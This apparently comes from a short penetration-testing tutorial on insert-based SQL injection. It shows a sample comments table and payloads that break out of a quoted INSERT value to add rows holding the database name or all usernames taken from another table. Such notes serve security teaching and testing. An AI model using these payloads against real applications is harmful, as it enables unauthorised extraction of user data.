Insert-based SQLi

Most SQL requests are based on SELECT, but we may encounter sometimes INSERT, UPDATE, and DELETE.

Insert can be exploited to insert records used to exfiltrate data. For instance, assume there is a SQLi in the function adding comments:

create table comment
(
    id int auto_increment primary key,
    content text not null
);

We could extract data by escaping the quoted attribute and insert a new record with a value computed from a request.

-INSERT INTO comment(content) VALUES ('a')
+INSERT INTO comment(content) VALUES ('a'), (database())-- -'
+INSERT INTO comment(content) VALUES ('a'), ((SELECT group_concat(username) from membres))-- -'

Insert-based SQLi ¶

Insert-based SQLi